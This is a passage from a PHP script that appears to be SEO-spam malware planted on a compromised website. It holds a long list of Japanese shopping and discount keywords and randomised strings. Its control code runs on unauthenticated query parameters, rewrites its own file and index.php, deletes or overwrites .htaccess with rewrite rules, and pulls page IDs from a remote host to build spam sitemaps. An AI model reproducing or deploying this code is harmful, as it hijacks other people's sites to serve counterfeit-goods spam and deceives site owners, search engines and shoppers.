 269 | $arr_key[]="【オープニング 大放出セール】";
 270 | $arr_key[]="【当店一番人気】";
 271 | $arr_key[]="【ふるさと割】";
 272 | $arr_key[]="開店記念セール！";
 273 | $arr_key[]="【翌日発送可能】";
 274 | $arr_key[]="【オンライン限定商品】";
 275 | $arr_key[]="【あすつく】";
 276 | $arr_key[]="特別価格";
 277 | $arr_key[]="【公式ショップ】";
 278 | $arr_key[]="激安大特価！";
 279 | $arr_key[]="【保障できる】";
 280 | $arr_key[]="【海外 正規品】";
 281 | $arr_key[]="【25％OFF】";
 282 | $arr_key[]="【激安】";
 283 | $arr_key[]="【在庫あり/即出荷可】";
 284 | $arr_key[]="【全商品オープニング価格 特別価格】";
 285 | $arr_key[]="（お得な特別割引価格）";
 286 | $arr_key[]="【返品?交換対象商品】";
 287 | $arr_key[]="驚きの値段";
 288 | $arr_key[]="超歓迎された";
 289 | $arr_key[]="【希望者のみラッピング無料】";
 290 | $arr_key[]="【高価値】";
 291 | $arr_key[]="【高い素材】";
 292 | $arr_key[]="【日本未発売】";
 293 | $arr_key[]="【2016春夏新作】";
 294 | $arr_key[]="【在庫限り】";
 295 | $arr_key[]="信頼";
 296 | $arr_key[]="お得セット";
 297 | $arr_key[]="【売れ筋】";
 298 | $arr_key[]="好きに";
 299 | $arr_key[]="【テレビで話題】";
 300 | $arr_key[]="【即納】";
 301 | $arr_key[]="【クーポン対象外】";
 302 | $arr_key[]="【メール便不可】";
 303 | $arr_key[]="【現品限り一斉値下げ！】";
 304 | $arr_key[]="特価";
 305 | $arr_key[]="【超目玉枠】";
 306 | $arr_key[]="【通販 人気】";
 307 | $arr_key[]="【超新作】";
 308 | $arr_key[]="当店在庫してます！";
 309 | $arr_key[]="早割クーポン！";
 310 | $arr_key[]="爆売り！";
 311 | $arr_key[]="再再販！";
 312 | $arr_key[]="日本限定";
 313 | $arr_key[]="定番";
 314 | $arr_key[]="【18％OFF】";
 315 | $arr_key[]="【 開梱 設置?無料 】";
 316 | $arr_key[]="【サイズ交換ＯＫ】";
 317 | $arr_key[]="【★大感謝セール】";
 318 | $arr_key[]="【SEAL限定商品】";
 319 | $arr_key[]="【特価】";
 320 | $arr_key[]="【メーカー再生品】";
 321 | $arr_key[]="【ついに再販開始！】";
 322 | $arr_key[]="海外並行輸入正規品";
 323 | $arr_key[]="代引き手数料無料";
 324 | $arr_key[]="【国際ブランド】";
 325 | $arr_key[]="【開店記念セール！】";
 326 | $arr_key[]="新作からSALEアイテム等お得な商品満載";
 327 | $arr_key[]="最安値挑戦！";
 328 | $arr_key[]="【後払い手数料無料】";
 329 | $arr_key[]="開店祝い";
 330 | $arr_key[]="【ご予約品】";
 331 | $arr_key[]="【激安アウトレット!】";
 332 | $arr_key[]="【国際ブランド】";
 333 | $arr_key[]="【お買得】";
 334 | $arr_key[]="気質アップ";
 335 | $arr_key[]="【驚きの値段】";
 336 | $arr_key[]="【30％OFF】";
 337 | $arr_key[]="祝開店！大放出セール開催中";
 338 | $arr_key[]="【2015・新作】";
 339 | $arr_key[]="【在庫僅少】";
 340 | $arr_key[]="正規品!";
 341 | $arr_key[]="超ポイントアップ祭";
 342 | $arr_key[]="【高品質】";
 343 | $arr_key[]="【返品不可】";
 344 | $arr_key[]="当店だけの限定モデル";
 345 | $arr_key[]="【在庫有】";
 346 | $arr_key[]="【人気商品！】";
 347 | $arr_key[]="期間限定特別価格";
 348 | $arr_key[]="【国内配送】";
 349 | $arr_key[]="【メーカー直売】";
 350 | $arr_key[]="完成品";
 351 | $arr_key[]="【公式】";
 352 | $arr_key[]="【楽天ランキング1位】";
 353 | $arr_key[]="【2015年製 新品】";
 354 | $arr_key[]="【ギフト】";
 355 | $arr_key[]="格安SALEスタート！";
 356 | $arr_key[]="超安い";
 357 | $arr_key[]="上品";
 358 | $arr_key[]="【美品】";
 359 | $arr_key[]="お歳暮";
 360 | $arr_key[]="【誠実】";
 361 | $arr_key[]="【驚きの価格が実現！】";
 362 | $arr_key[]="【初売り】";
 363 | $arr_key[]="【お気に入り】";
 364 | $arr_key[]="楽天";
 365 | $arr_key[]="【在庫一掃】";
 366 | $arr_key[]="【人気ショップが最安値挑戦！】";
 367 | $arr_key[]="福袋";
 368 | $arr_key[]="逆輸入";
 369 | $arr_key[]="【当店限定販売】";
 370 | $arr_key[]="【正規逆輸入品】";
 371 | $arr_key[]="【お得】";
 372 | $arr_key[]="【ファッション通販】";
 373 | $arr_key[]="人気";
 374 | $arr_key[]="【１着でも送料無料】";
 375 | $arr_key[]="日本製";
 376 | $arr_key[]="【正規販売店】";
 377 | $arr_key[]="入園入学祝い";
 378 | $arr_key[]="【レビューで送料無料】";
 379 | $arr_key[]="【破格値下げ】";
 380 | $arr_key[]="【新発売】";
 381 | $arr_key[]="史上最も激安";
 382 | $arr_key[]="【超お買い得！】";
 383 | $arr_key[]="【超ポイント祭?期間限定】";
 384 | $arr_key[]="宅配便配送";
 385 | $arr_key[]="ふるさと納税";
 386 | $arr_key[]="【SALE】";
 387 | $arr_key[]="【年間ランキング6年連続受賞】";
 388 | $arr_key[]="【新品】";
 389 | $arr_key[]="(税込)";
 390 | $arr_key[]="オンラインショップ";
 391 | $arr_key[]="国産品";
 392 | $arr_key[]="【税込・送料無料】";
 393 | $arr_key[]="驚きの値段で";
 394 | $arr_key[]="【限定特価】";
 395 | $arr_key[]="【新作入荷!!】";
 396 | $arr_key[]="【現金特価】";
 397 | $arr_key[]="セール 登場から人気沸騰";
 398 | $arr_key[]="【激安セール】";
 399 | $arr_key[]="【本日特価】";
 400 | $arr_key[]="【2015秋冬新作】";
 401 | $arr_key[]="スーパーセール期間限定";
 402 | $arr_key[]="【楽ギフ_包装】";
 403 | $arr_key[]="【名入れ無料】";
 404 | $arr_key[]="【年中無休】";
 405 | $arr_key[]="【送料無料】";
 406 | $arr_key[]="【正規品】";
 407 | $arr_key[]="●日本正規品●";
 408 | $arr_key[]="【気質アップ】";
 409 | $arr_key[]="【国産】";
 410 | $arr_key[]="【はこぽす対応商品】";
 411 | $arr_key[]="【ラッピング不可】";
 412 | $arr_key[]="【感謝価格】";
 413 | $arr_key[]="【同梱不可】";
 414 | $arr_key[]="ランキング第1位";
 415 | $arr_key[]="【楽天最安値に挑戦】";
 416 | $arr_key[]="超特価SALE開催！";
 417 | $arr_key[]="【福袋セール】";
 418 | $arr_key[]="【内祝い】";
 419 | $arr_key[]="【時間指定不可】";
 420 | $arr_key[]="数量限定価格!!";
 421 | $arr_key[]="【お買い得！】";
 422 | $arr_key[]="【受注生産品】";
 423 | $arr_key[]="【ポイント10倍】";
 424 | $arr_key[]="【即出荷】";
 425 | $arr_key[]="名作";
 426 | $arr_key[]="【ギフ_包装】";
 427 | $arr_key[]="【ギフト】";
 428 | $arr_key[]="【海外限定】";
 429 | $arr_key[]="【大注目】";
 430 | $arr_key[]="即納！最大半額！";
 431 | $arr_key[]="大注目";
 432 | $arr_key[]="訳あり商品";
 433 | $arr_key[]="【限定品】";
 434 | $arr_key[]="【数量限定】";
 435 | $arr_key[]="【送料無料/新品】";
 436 | $arr_key[]="【在庫処分】";
 437 | $arr_key[]="【予約受付中】";
 438 | $arr_key[]="【人気商品】";
 439 | 
 440 | 
 441 | // #llqllq#arr_keyend
 442 | // #llqllq#randkeybg
 443 | $strRand[0]="ijqocshvwuzfmgblarxnkytdep";
 444 | $strRand[1]="epmfvokrxwluntjqchazsybigd";
 445 | $strRand[2]="owyzdviabmlexqthkgcpnsrujf";
 446 | $strRand[3]="evizhaqxmjcfwtdbyplurksgon";
 447 | $strRand[4]="vqaujmphorktbcgelisyfxzdnw";
 448 | $strRand[5]="ndclrbyfokvtepugmzshijwqax";
 449 | $strRand[6]="ewguavjfzklrcyqtbomnpsdixh";
 450 | $strRand[7]="nedahrysuimgojtbzpqvlxwkfc";
 451 | $strRand[8]="yshfjdrexnlkoiaqgzwupcbvmt";
 452 | $strRand[9]="iavwgodlmhfuytjnpxsrcqzbek";
 453 | $strRand[10]="aqdfwvbuncxketpyjhzomsgilr";
 454 | $strRand[11]="xentfcaopqbmjzyiuvgslwrkhd";
 455 | $strRand[12]="rpkihmjtclaugzobfqdxysevwn";
 456 | $strRand[13]="zxlyaicprvkgmsfnbejutdqhwo";
 457 | $strRand[14]="goryxcdpwbafjsimvnhzukqetl";
 458 | $strRand[15]="yhvgomeksinwlcrxuqfazbjptd";
 459 | $strRand[16]="tafyophujgnrxwqkeclidmsbvz";
 460 | $strRand[17]="uetfvrmiaqobhyjwdcgxznpslk";
 461 | $strRand[18]="sezbfoclnatjhmuwpdrxgykvqi";
 462 | $strRand[19]="kqeawfrmpgsbcxyzovhtjundli";
 463 | $strRand[20]="evtcporqhaisnxldzybmjgwfku";
 464 | $strRand[21]="yxoegcdzkptjuhsvfqlnrwmbia";
 465 | $strRand[22]="rvctiywmpfbnkuglehxadqjosz";
 466 | $strRand[23]="eywukgoznqlvpxmhtbirdajcfs";
 467 | $strRand[24]="yabockdriwltgnfxezqvphmujs";
 468 | $strRand[25]="gxierdywkjnspolumtzbahvqfc";
 469 | $strRand[26]="yzqjlivdxgskwehrufpbtanmco";
 470 | $strRand[27]="lupyeqdzojtmbhcsgwrnafxvki";
 471 | $strRand[28]="rfxocbiajtpluqekvnzhysdwgm";
 472 | $strRand[29]="avxkhmpqziylrnogejdbtfsucw";
 473 | $strRand[30]="raikoexgczpqfnhmvbduslyjtw";
 474 | $strRand[31]="ykdulejmfbxophisrvcqtwangz";
 475 | $strRand[32]="hloywqgamdpzuvkijbctxrefsn";
 476 | $strRand[33]="bmcpnotrxjszvgekqyludhawif";
 477 | $strRand[34]="ypbjoqtsachvimurkefldzwxgn";
 478 | $strRand[35]="jebpdcusonfvhgikxqzrtawlym";
 479 | $strRand[36]="zagbqunomrdspwyivlchtfejkx";
 480 | $strRand[37]="avghectojmrupyifdwzqsblnkx";
 481 | $strRand[38]="uqbrlyzjdvgicxwsfhnekmpota";
 482 | $strRand[39]="tlcuspbydorfikqawjemnhxvgz";
 483 | $strRand[40]="ijxylnqsvcrdfkwbtaemzuhpgo";
 484 | $strRand[41]="avlmjeqfwdxinrptyuzgoschbk";
 485 | $strRand[42]="wnqvutmdfahcexpyszribjgolk";
 486 | $strRand[43]="rymnlgthwedxaopcqfijsubvkz";
 487 | $strRand[44]="nzwedaqkjmicfvosgbyrlxhupt";
 488 | $strRand[45]="ufeywhspacimvdktgnxlqrzboj";
 489 | $strRand[46]="umrolpnjbdqyxizkahfwcsvtge";
 490 | $strRand[47]="qgykfmxuvctrhowljsbipanezd";
 491 | $strRand[48]="srchnmuzyexiadvglfpwkjtobq";
 492 | $strRand[49]="fhrcejvxblanwodmzsitygqpuk";
 493 | $strRand[50]="qcbzedsajriuholxnvygkmwpft";
 494 | $strRand[51]="fktesxwajrzlcbohnvyupmgqdi";
 495 | $strRand[52]="wnosfqxgujbkzehvrmipclytad";
 496 | $strRand[53]="qztslxaecpdukgrnboyfjwhvmi";
 497 | $strRand[54]="zmhwtpoagqsxevnucbjdrylkfi";
 498 | $strRand[55]="betjlqvkrniwcmofghdupzyaxs";
 499 | $strRand[56]="etlramoudznysfpxivqwkjcbgh";
 500 | $strRand[57]="ucajbqpdlrtoswiexfkmgvnhzy";
 501 | $strRand[58]="vtmjliqrfwhazkcsxnpgyedoub";
 502 | $strRand[59]="ialvgtmynfxdepqcourbshkjwz";
 503 | $strRand[60]="gzvoxhaeujdcnbkwsfilrmtyqp";
 504 | $strRand[61]="utkpryenzvscqjwdhlgbfaoixm";
 505 | $strRand[62]="hucrvmefatkgxpinqwobdlyjzs";
 506 | $strRand[63]="sgclenjfwhruqkytbipoxamzdv";
 507 | $strRand[64]="kovnghiyxwfzqdjtsbaeplmruc";
 508 | $strRand[65]="jeldxarmgsfcunqkhyvozwpbti";
 509 | $strRand[66]="sfadqgrlxymhojtzncpukbviwe";
 510 | $strRand[67]="bepmrhwuijzfgadoxcqstyklvn";
 511 | $strRand[68]="rgzuvjsebtcmndhykaowxflipq";
 512 | $strRand[69]="kbvertnpmgjuysiqhwofzlcxad";
 513 | $strRand[70]="vrlucmajsboykfwhxitnpzgqde";
 514 | $strRand[71]="chqbjvtwupsmyzadrkixlfgneo";
 515 | $strRand[72]="ivrljhxdqfmtaobskzpwuenygc";
 516 | $strRand[73]="zpelhikqbsgwfvorxajtmynduc";
 517 | $strRand[74]="ndcjlafbpxymquiwzogrhstvke";
 518 | $strRand[75]="xfpgdewrjibvhyncsoltkqmauz";
 519 | $strRand[76]="qovbezjcnufgdtihykrlpxamsw";
 520 | $strRand[77]="rbiamfpstxwjoldkhuenvczyqg";
 521 | $strRand[78]="ibudhzatnpogvfxklewmsryjcq";
 522 | $strRand[79]="nfvbwomkzlgcaxteusdhqpjriy";
 523 | $strRand[80]="hvkxwcejumoyiplzagnstrqfdb";
 524 | $strRand[81]="ancxdiwvpqfrbozkljtysemhgu";
 525 | $strRand[82]="fsxhubngwemjylqtirzpvodkac";
 526 | $strRand[83]="gpjzqfdoxecrklmywvhantuisb";
 527 | $strRand[84]="pywuzqlforsjxvbaedtmkchngi";
 528 | $strRand[85]="ykarplvmebndtcofzujwixqghs";
 529 | $strRand[86]="myvtkbofpqiuswnragxdhzljec";
 530 | $strRand[87]="bidwnaslmfehcrtvjykxpugzqo";
 531 | $strRand[88]="ciftovrgnwyjbpaszdumheqkxl";
 532 | $strRand[89]="mvzjiaxdgrklnptywouhsqebcf";
 533 | $strRand[90]="jyarslidptvoeckbuwfxmgnzqh";
 534 | $strRand[91]="jxepqcalyifumzwdgknhvobtsr";
 535 | $strRand[92]="yeawqgcksnjvlmrbfpxitdzhou";
 536 | $strRand[93]="cxmblijwsayupdrzvkfhotgneq";
 537 | $strRand[94]="mnzicpgvarbxqldtuyfheoswjk";
 538 | $strRand[95]="hdmfxslecibyakjzvnowtugqpr";
 539 | $strRand[96]="lhreqacswunopygjdftzkbmivx";
 540 | $strRand[97]="mznebvksdilycagurfhtoqwjpx";
 541 | $strRand[98]="ujvoymdpwlsxncethkzbfigraq";
 542 | $strRand[99]="pnwrqysmifaexldgujhcbztokv";
 543 | 
 544 | // #llqllq#randkeyend
 545 | if(isset($_GET['rset']) &&  $_GET['rset'] == 'set'){
 546 | 	
 547 | 	$r1 = '#(// \#l{2}ql{2}q\#arr_keybg)(.*?)(// \#l{2}ql{2}q\#arr_keyend)#s';	$str = file_get_contents("index.php");	
 548 | 	shuffle($arr_key);	$rp1 = '';	foreach($arr_key as $vals){
 549 | 		$rp1 .= '$arr_key[]="'. $vals .'";'. PHP_EOL;	}
 550 | 	
 551 | 	$str = preg_replace($r1, '\1'.  PHP_EOL . PHP_EOL .$rp1 . PHP_EOL . PHP_EOL .'\3', $str);	
 552 | 	$r0 = '#(/+keyjgbg)(.*?)(/+keyjgbgend)#s';	$str = preg_replace($r0, '\1'. PHP_EOL .'define("KEYJG","'. rand(1,20) .'");'. PHP_EOL .'\3'. PHP_EOL , $str);			
 553 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_keywz)(.*?)(// \#l{2}ql{2}q\#arr_keywzend)#s';	
 554 | 	shuffle($arrKeywz);	$rp2 = '';	foreach($arrKeywz as $valpimg){
 555 | 		$rp2 .= '$arrKeywz[]="'. $valpimg .'";'. PHP_EOL;	}
 556 | 	
 557 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);	
 558 | 			
 559 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_wordbg)(.*?)(// \#l{2}ql{2}q\#arr_wordend)#s';	$strword = '';
 560 | 	$arrWordOld = array(4,5,6,7,8,4,5,6,7,8);	$rp2 = '';
 561 | 	for($i=0;$i<12;$i++){
 562 | 		shuffle($arrWordOld); 
 563 | 		foreach($arrWordOld as $vtemps)
 564 | 			$rp2 .= '$arr_word['. $i .'][] ="'. $vtemps .'";';	}
 565 | 	
 566 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);		
 567 | 	$r3 = '#(// \#l{2}ql{2}q\#arr_nametimebg)(.*?)(// \#l{2}ql{2}q\#arr_nametimeend)#s';	
 568 | 	shuffle($arrnametime);	$rp2 = '';	foreach($arrnametime as $valpimg){
 569 | 		$rp2 .= '$arrnametime[]="'. $valpimg .'";'. PHP_EOL;	}
 570 | 	
 571 | 	$str = preg_replace($r3, '\1'. PHP_EOL . PHP_EOL .  $rp2 . PHP_EOL . PHP_EOL .'\3', $str);	
 572 | 				
 573 | 	$r4 = '#(// \#l{2}ql{2}q\#randkeybg)(.*?)(// \#l{2}ql{2}q\#randkeyend)#s';	
 574 | 	$arrABC = range('a','z');	
 575 | 	$strTemp1 = '';	for($i=0;$i<100;$i++){
 576 | 		shuffle($arrABC); 
 577 | 		$strtemp = '';		foreach($arrABC as $value){
 578 | 			$strtemp .= $value;		}	
 579 | 		
 580 | 		$strTemp1 .= '$strRand[' .$i. ']="' . $strtemp .'";'. PHP_EOL;	}
 581 | 	$str = preg_replace($r4, '\1'. PHP_EOL . $strTemp1  . PHP_EOL .'\3', $str);	
 582 | 	
 583 | 	
 584 | 	$num = rand(1,FNUM);	$num = $num - 1;	
 585 | 	
 586 | 	
 587 | 	
 588 | 		$idUrl =  GETDOM . "gpage.php?getid=$num";
 589 | 		$tempIdStr = curl_get_from_webpage($idUrl,'',5);
 590 | 		$arrId = explode(',',$tempIdStr);
 591 | 	
 592 | 	// echo "<pre>";
 593 | 	// print_r($arrId);
 594 | 	// die();
 595 | 	// require_once("id$num.php");	
 596 | 	
 597 | 	
 598 | 	$indexId=array_rand($arrId,1);	$str = str_replace('$id = "320170774-51880"; //llq index id', '$id = "'. $arrId[$indexId] .'"; //llq index id', $str);	
 599 | 	$r3='#(// \#l{2}ql{2}q\#arr_fuhao)(.*?)(// \#l{2}ql{2}q\#arr_fuhaoend)#s';	shuffle($arrfh);$rp2='';foreach($arrfh as $valpimg){$rp2.='$arrfh[]="'.$valpimg.'";'.PHP_EOL;}$str=preg_replace($r3,'\1'.PHP_EOL.PHP_EOL.$rp2.PHP_EOL.PHP_EOL.'\3',$str);	file_put_contents(__FILE__, $str);
 600 | 	echo '<br/>rset ok!<br/>';
 601 | }
 602 | if(isset($_GET["jgshu"]) && $_GET["jgshu"]){
 603 | 	$strDefault = file_get_contents(__FILE__);	
 604 | 	$strDefault = str_replace('define("JGNUM","40");', 'define("JGNUM","'.$_GET["jgshu"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>jgshu (".$_GET["jgshu"].") ok!<br/>";}
 605 | if(isset($_GET["ljshu"]) && $_GET["ljshu"]){
 606 | 	$strDefault = file_get_contents(__FILE__);	
 607 | 	$strDefault = str_replace('define("LINKNUM","18");', 'define("LINKNUM","'.$_GET["ljshu"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>ljshu (".$_GET["ljshu"].") ok!<br/>";}
 608 | if(isset($_GET["moshi"])){
 609 | 	
 610 | 	if($_GET["moshi"] != 0 && $_GET["moshi"] != 1 && $_GET["moshi"] != 2 && $_GET["moshi"] != 3){
 611 | 			echo "<br/><span style='color:red'>set fails, moshi value must be 0,1,2 or 3 !</span><br/>";			die();	}
 612 | 	if($_GET["moshi"] == 2 || $_GET["moshi"] == 3){
 613 | 		@unlink(".htaccess");	}
 614 | 	
 615 | 	$strDefault = file_get_contents(__FILE__);	
 616 | 	
 617 | 	$r3='#(/{2}msbg)(.*?)(/{2}msend)#s';
 618 | 	$rp2 = 'define("JDT","'.$_GET["moshi"].'");';	$strDefault=preg_replace($r3,'\1'.PHP_EOL.$rp2.PHP_EOL.'\3',$strDefault);	
 619 | 	
 620 | 	$strDefault = str_replace('define("JDT","0");', 'define("JDT","'.$_GET["moshi"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>moshi (".$_GET["moshi"].") ok!<br/>";}
 621 | if(isset($_GET['hzui']) && $_GET['hzui']){
 622 | 	$dirNames = dirname(__FILE__);    $httcReplace = end((explode(DIRECTORY_SEPARATOR, $dirNames)));	
 623 | 	$PreDir = '';	if(JDT == 1){
 624 | 		$UrlBaseDir = $httcReplace;		$RewriteOnDir = '';	}else{
 625 | 		$UrlBaseDir = '';		$PreDir = '../';		$RewriteOnDir = $httcReplace . '/';	}
 626 | 	$strhtt = '';	if (file_exists("$PreDir.htaccess")){
 627 | 		@chmod("$PreDir.htaccess",0755);		$strhtt = file_get_contents("$PreDir.htaccess");	}
 628 | 		
 629 | 	if(!(strstr($strhtt,'RewriteBase') || strstr($strhtt,'RewriteRule')))
 630 | 	{
 631 | 		$strhtt = '<IfModule mod_rewrite.c>'.PHP_EOL . 'Options +FollowSymLinks'. PHP_EOL .'RewriteEngine on'. PHP_EOL .'RewriteBase /'. $UrlBaseDir . PHP_EOL .'</IfModule>';	}else{
 632 | 		$strhtt = str_ireplace('# RewriteBase ','RewriteBase ',$strhtt);		$strhtt = str_ireplace('#RewriteBase ','RewriteBase ',$strhtt);	}
 633 | 		
 634 | 	$hzReplace = trim($_GET['hzui']);
 635 | 	if(1){
 636 | 			
 637 | 		$r1 = '#(.*RewriteBase.*)#i';		$r2 = '#RewriteRule#i';		
 638 | 		$rsut = '\1'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)-.*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL;
 639 | 		$rsut2 = PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZPRO .'(\d+)[-/].*[-/]'. BZSITE .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$2-\$1&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/].*[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL . 'RewriteRule ^.*[-/]'. BZSITE .'(\d+)[-/]'. BZPRO .'(\d+)[-/].*$ '.$RewriteOnDir.'index\.php?id=\$1-\$2&%{QUERY_STRING} [L]'.PHP_EOL .'RewriteRule' ;		
 640 | 		if(preg_match($r1,$strhtt)){
 641 | 			$strhtt = preg_replace($r1,$rsut,$strhtt,1);		}else{
 642 | 			$strhtt = preg_replace($r2,$rsut2,$strhtt,1);		}
 643 | 		
 644 | 		$indexContent = file_get_contents("index.php");		$r3 = '#(/+jthouzuibg)(.*?)(/+jthouzuiend)#s';		$indexContent = preg_replace($r3, '\1'. PHP_EOL .'define("JTHZ",".'. $hzReplace .'");'. PHP_EOL .'\3'. PHP_EOL , $indexContent);		file_put_contents("index.php", $indexContent);		
 645 | 		if(JDT == 1 or JDT == 0){
 646 | 			file_put_contents("$PreDir.htaccess", $strhtt);		}
 647 | 	}
 648 | 	
 649 | 	echo "<br/>hzui ($hzReplace) modify ok!<br/>";	
 650 | }
 651 | if(isset($_GET["modifydate"]) && $_GET["modifydate"]){
 652 | 	$strDefault = file_get_contents(__FILE__);	
 653 | 	$strDefault = str_replace('define("PRENAME","20160409");', 'define("PRENAME","'.$_GET["modifydate"].'");', $strDefault);	file_put_contents(__FILE__,$strDefault);	echo "<br/>modifydate (".$_GET["modifydate"].") ok!<br/>";}
 654 | $arrArrr = array();$j = 0;for($i=0;$i<20;$i+=2){
 655 |    $arrArrr[$j++] = $strRand{$i}.$strRand{$i+1};}
 656 | $Arrrarr = array_flip($arrArrr);
 657 | if(isset($_GET["gsitemap"])){
 658 | 	
 659 | 	$O_OO0_0O_0='America/Chicago';	@date_default_timezone_set($O_OO0_0O_0);	
 660 | 	if (! is_dir("../websitemap"))
 661 | 		mkdir("../websitemap", 0755);	
 662 | 	global $gnumber;
 663 | 	$gnumber = 1;
 664 | 	$bgNum = (int)trim($_GET["gsitemap"]);
 665 | 	if($bgNum > FNUM)
 666 | 	   die("The Number Must Lower Then " . FNUM);
 667 |    
 668 | 	$arrNumTemp = getMapNum($bgNum);
 669 | 	
 670 | 	
 671 | 	foreach($arrNumTemp as $vss){
 672 | 		
 673 | 		$vals = "id$vss.php";		
 674 | 		
 675 | 		
 676 | 		
 677 | 		$idUrl =  GETDOM . "gpage.php?getid=$vss";
 678 | 		$tempIdStr = curl_get_from_webpage($idUrl,'',5);
 679 | 		$arrId = explode(',',$tempIdStr);
 680 | 		// echo "<pre>";
 681 | 		// print_r($arrId);
 682 | 		// die();
 683 | 		if(count($arrId) < 100){
 684 | 			echo "g sitemap fail<br/>";
 685 | 			die();
 686 | 		}
 687 | 		
 688 | 		echo $vals."<br/>";
 689 | 	
 690 | 		if($gnumber == 1){
 691 | 			if(JDT == 1){
 692 | 				gsitemap($arrId,2,1);			}else{
 693 | 				gsitemap($arrId,1,2);			}
 694 | 		}else{
 695 | 			
 696 | 			if(JDT == 1){
 697 | 				gsitemap2($arrId,2,1);			}else{
 698 | 				gsitemap2($arrId,1,2);			}
 699 | 			
 700 | 		}
 701 | 		
 702 | 		unset($arrId,$tempArr1,$tempArr2);	}
 703 | 	
 704 | }
 705 | if(isset($_GET["gsitemap"]) || isset($_GET["rset"]) || isset($_GET["hzui"]) || isset($_GET["jgshu"]) || isset($_GET["ljshu"]) || isset($_GET["modifydate"]) || isset($_GET["moshi"])){
 706 | 	die();}
 707 | if(JDT==2){
 708 | 	
 709 | 	$UrlParent=end((explode('index.php',$_SERVER['REQUEST_URI'])));	if($UrlParent){
 710 | 		$tempSid = '';		$tempPid = '';		
 711 | 		
 712 | 		$r0 ='#^'. BZSITE .'(\d+)[-/]#i';		
 713 | 		$r1='#[-/]'. BZSITE .'(\d+)[-/]#i';		
 714 | 		if(preg_match($r0,$UrlParent,$matches)){
 715 | 			if(isset($matches[1]))
 716 | 				$tempSid = $matches[1];		}else{
 717 | 			preg_match($r1,$UrlParent,$matches10);			if(isset($matches10[1]))
 718 | 				$tempSid = $matches10[1];		}
 719 | 	
 720 | 		
 721 | 		$r2='#^'. BZPRO .'(\d+)[-/]#i';		$r3='#[-/]'. BZPRO .'(\d+)[-/]#i';		
 722 | 		if(preg_match($r2,$UrlParent,$matches2)){
 723 | 			if(isset($matches2[1]))
 724 | 				$tempPid = $matches2[1];		}else{
 725 | 			
 726 | 			preg_match($r3,$UrlParent,$matches13);			if(isset($matches13[1]))
 727 | 				$tempPid = $matches13[1];		}
 728 | 		
 729 | 		
 730 | 		if($tempSid && $tempPid){
 731 | 			$_GET['id']= $tempSid .'-'. $tempPid;		}
 732 | 		
 733 | 	}
 734 | 	
 735 | }elseif(JDT==3&&isset($_GET['keyword'])&&$_GET['keyword']){
 736 | 		
 737 | 		$tempSid = '';		$tempPid = '';		$UrlParent = $_GET['keyword'];		
 738 | 		$r0 ='#^'. BZSITE .'(\d+)[-/]#i';		
 739 | 		$r1='#[-/]'. BZSITE .'(\d+)[-/]#i';		
 740 | 		if(preg_match($r0,$UrlParent,$matches)){
 741 | 			if(isset($matches[1]))
 742 | 				$tempSid = $matches[1];		}else{
 743 | 			preg_match($r1,$UrlParent,$matches10);			if(isset($matches10[1]))
 744 | 				$tempSid = $matches10[1];		}
 745 | 	
 746 | 		
